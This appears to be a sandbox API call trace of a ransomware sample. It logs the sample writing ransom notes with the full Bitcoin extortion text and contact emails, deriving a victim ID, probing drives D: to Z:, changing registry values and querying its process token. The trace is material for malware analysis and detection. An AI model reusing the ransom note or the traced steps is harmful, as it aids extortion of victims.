	[0202.385] CreateFileW (lpFileName="C:\\Windows\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\windows\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0202.387] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0202.387] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0202.390] CloseHandle (hObject=0x378) returned 1
	[0202.390] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.391] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0202.392] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0202.392] CreateFileW (lpFileName="C:\\Windows\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\windows\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0202.393] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0202.393] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0202.393] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0202.393] CloseHandle (hObject=0x378) returned 1
	[0202.394] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0202.394] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0202.394] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0202.394] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Windows\\HELP_DECRYPT_YOUR_FILES.HTML") returned 39
	[0202.394] CreateFileW (lpFileName="C:\\Windows\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\windows\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0202.397] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0202.397] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0202.399] CloseHandle (hObject=0x378) returned 1
	[0202.399] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.400] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.400] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0202.401] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0202.401] CreateFileW (lpFileName="C:\\Windows\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\windows\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0202.402] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0202.402] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0202.402] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0202.402] CloseHandle (hObject=0x378) returned 1
	[0202.402] FindFirstFileW (in: lpFileName="C:\\Windows\\*.*" (normalized: "c:\\windows\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x922905cc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x922b6768, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0202.403] lstrlenW (lpString="C:\\Windows\\*.*") returned 14
	[0202.403] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0202.403] CharLowerBuffW (in: lpsz="C:\\Windows\\*.*", cchLength=0xe | out: lpsz="c:\\windows\\*.*") returned 0xe
	[0202.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.403] StrStrW (lpFirst="c:\\windows\\*.*", lpSrch="windows") returned="windows\\*.*"
	[0202.403] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0202.403] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xdf96a590, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xdf96a590, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Windows", cAlternateFileName="")) returned 0
	[0202.404] FindClose (in: hFindFile=0xfb9b70 | out: hFindFile=0xfb9b70) returned 1
	[0202.404] FindClose (in: hFindFile=0xfb9b70 | out: hFindFile=0xfb9b70) returned 0
	[0202.404] Sleep (dwMilliseconds=0x3e8) 
	[0203.521] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="D:") returned 2
	[0203.521] GetDriveTypeW (lpRootPathName="D:") returned 0x1
	[0203.522] Sleep (dwMilliseconds=0x3e8) 
	[0204.568] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="E:") returned 2
	[0204.568] GetDriveTypeW (lpRootPathName="E:") returned 0x1
	[0204.568] Sleep (dwMilliseconds=0x3e8) 
	[0205.634] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="F:") returned 2
	[0205.635] GetDriveTypeW (lpRootPathName="F:") returned 0x1
	[0205.635] Sleep (dwMilliseconds=0x3e8) 
	[0206.654] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="G:") returned 2
	[0206.654] GetDriveTypeW (lpRootPathName="G:") returned 0x1
	[0206.655] Sleep (dwMilliseconds=0x3e8) 
	[0207.687] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="H:") returned 2
	[0207.687] GetDriveTypeW (lpRootPathName="H:") returned 0x1
	[0207.687] Sleep (dwMilliseconds=0x3e8) 
	[0208.775] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="I:") returned 2
	[0208.775] GetDriveTypeW (lpRootPathName="I:") returned 0x1
	[0208.775] Sleep (dwMilliseconds=0x3e8) 
	[0209.795] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="J:") returned 2
	[0209.795] GetDriveTypeW (lpRootPathName="J:") returned 0x1
	[0209.795] Sleep (dwMilliseconds=0x3e8) 
	[0210.928] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="K:") returned 2
	[0210.928] GetDriveTypeW (lpRootPathName="K:") returned 0x1
	[0210.928] Sleep (dwMilliseconds=0x3e8) 
	[0211.936] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="L:") returned 2
	[0211.936] GetDriveTypeW (lpRootPathName="L:") returned 0x1
	[0211.937] Sleep (dwMilliseconds=0x3e8) 
	[0212.974] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="M:") returned 2
	[0212.974] GetDriveTypeW (lpRootPathName="M:") returned 0x1
	[0212.974] Sleep (dwMilliseconds=0x3e8) 
	[0213.984] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="N:") returned 2
	[0213.984] GetDriveTypeW (lpRootPathName="N:") returned 0x1
	[0213.984] Sleep (dwMilliseconds=0x3e8) 
	[0215.039] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="O:") returned 2
	[0215.039] GetDriveTypeW (lpRootPathName="O:") returned 0x1
	[0215.039] Sleep (dwMilliseconds=0x3e8) 
	[0216.043] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="P:") returned 2
	[0216.043] GetDriveTypeW (lpRootPathName="P:") returned 0x1
	[0216.044] Sleep (dwMilliseconds=0x3e8) 
	[0217.058] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="Q:") returned 2
	[0217.058] GetDriveTypeW (lpRootPathName="Q:") returned 0x1
	[0217.059] Sleep (dwMilliseconds=0x3e8) 
	[0218.129] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="R:") returned 2
	[0218.129] GetDriveTypeW (lpRootPathName="R:") returned 0x1
	[0218.130] Sleep (dwMilliseconds=0x3e8) 
	[0219.196] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="S:") returned 2
	[0219.196] GetDriveTypeW (lpRootPathName="S:") returned 0x1
	[0219.197] Sleep (dwMilliseconds=0x3e8) 
	[0219.211] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="T:") returned 2
	[0219.211] GetDriveTypeW (lpRootPathName="T:") returned 0x1
	[0219.212] Sleep (dwMilliseconds=0x3e8) 
	[0219.224] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="U:") returned 2
	[0219.224] GetDriveTypeW (lpRootPathName="U:") returned 0x1
	[0219.225] Sleep (dwMilliseconds=0x3e8) 
	[0219.249] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="V:") returned 2
	[0219.249] GetDriveTypeW (lpRootPathName="V:") returned 0x1
	[0219.250] Sleep (dwMilliseconds=0x3e8) 
	[0219.258] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="W:") returned 2
	[0219.259] GetDriveTypeW (lpRootPathName="W:") returned 0x1
	[0219.259] Sleep (dwMilliseconds=0x3e8) 
	[0219.416] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="X:") returned 2
	[0219.416] GetDriveTypeW (lpRootPathName="X:") returned 0x1
	[0219.417] Sleep (dwMilliseconds=0x3e8) 
	[0219.428] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="Y:") returned 2
	[0219.428] GetDriveTypeW (lpRootPathName="Y:") returned 0x1
	[0219.428] Sleep (dwMilliseconds=0x3e8) 
	[0219.442] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="Z:") returned 2
	[0219.442] GetDriveTypeW (lpRootPathName="Z:") returned 0x1
	[0219.442] Sleep (dwMilliseconds=0x3e8) 
	[0219.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.472] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare", ulOptions=0x0, samDesired=0xf023f, phkResult=0x18f4bc | out: phkResult=0x18f4bc*=0x3a0) returned 0x0
	[0219.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.473] RegDeleteValueW (hKey=0x3a0, lpValueName="ChromeLicensionHWare") returned 0x0
	[0219.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.474] RegFlushKey (hKey=0x3a0) returned 0x0
	[0219.865] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.866] RegCloseKey (hKey=0x3a0) returned 0x0
	[0219.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.866] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare", ulOptions=0x0, samDesired=0xf023f, phkResult=0x18f4b8 | out: phkResult=0x18f4b8*=0x3a0) returned 0x0
	[0219.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.866] RegSetValueExW (in: hKey=0x3a0, lpValueName="ChromeFirstVersionHardWare32", Reserved=0x0, dwType=0x1, lpData="TheEnd", cbData=0x208 | out: lpData="TheEnd") returned 0x0
	[0219.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.867] RegFlushKey (hKey=0x3a0) returned 0x0
	[0219.938] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.938] RegCloseKey (hKey=0x3a0) returned 0x0
	[0219.938] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0219.938] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x18f6dc, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1
	[0219.950] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0219.950] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0219.950] wsprintfW (in: param_1=0x18f1d0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT") returned 57
	[0219.950] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0
	[0219.954] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0219.954] WriteFile (in: hFile=0x2e0, lpBuffer=0x18e588*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18f4ac, lpOverlapped=0x0 | out: lpBuffer=0x18e588*, lpNumberOfBytesWritten=0x18f4ac*=0xc46, lpOverlapped=0x0) returned 1
	[0219.957] CloseHandle (hObject=0x2e0) returned 1
	[0219.957] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18e558, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18e558*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0219.958] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.958] GetUserNameA (in: lpBuffer=0x18e43c, pcbBuffer=0x18e554 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18e554) returned 1
	[0219.960] wsprintfW (in: param_1=0x18f3d8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0219.961] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0
	[0219.961] SetFilePointer (in: hFile=0x2e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0219.961] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0219.961] WriteFile (in: hFile=0x2e0, lpBuffer=0x18f3d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18f4b4, lpOverlapped=0x0 | out: lpBuffer=0x18f3d8*, lpNumberOfBytesWritten=0x18f4b4*=0x30, lpOverlapped=0x0) returned 1
	[0219.961] CloseHandle (hObject=0x2e0) returned 1
	[0219.962] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0219.962] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0219.962] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0219.962] wsprintfW (in: param_1=0x18f190, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML") returned 58
	[0219.962] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0
	[0219.965] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0219.965] WriteFile (in: hFile=0x2e0, lpBuffer=0x18e984*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18f4a8, lpOverlapped=0x0 | out: lpBuffer=0x18e984*, lpNumberOfBytesWritten=0x18f4a8*=0x808, lpOverlapped=0x0) returned 1
	[0219.969] CloseHandle (hObject=0x2e0) returned 1
	[0219.969] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0219.969] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18e96c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18e96c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0219.970] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.970] GetUserNameA (in: lpBuffer=0x18e850, pcbBuffer=0x18e968 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18e968) returned 1
	[0219.971] wsprintfA (in: param_1=0x18f398, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0219.971] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0
	[0219.976] SetFilePointer (in: hFile=0x2e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0219.977] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0219.977] WriteFile (in: hFile=0x2e0, lpBuffer=0x18f398*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18f4b0, lpOverlapped=0x0 | out: lpBuffer=0x18f398*, lpNumberOfBytesWritten=0x18f4b0*=0x43, lpOverlapped=0x0) returned 1
	[0219.977] CloseHandle (hObject=0x2e0) returned 1
	[0219.977] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0219.978] GetVersionExW (in: lpVersionInformation=0x18f3a4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f3a4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0219.978] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0219.978] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0219.978] GetCurrentProcess () returned 0xffffffff
	[0219.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.979] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18f04c | out: TokenHandle=0x18f04c*=0x2e0) returned 1
	[0219.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.979] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f044 | out: TokenInformation=0x0, ReturnLength=0x18f044) returned 0
	[0219.979] GetLastError () returned 0x7a
	[0219.979] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0xfa8800
	[0219.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
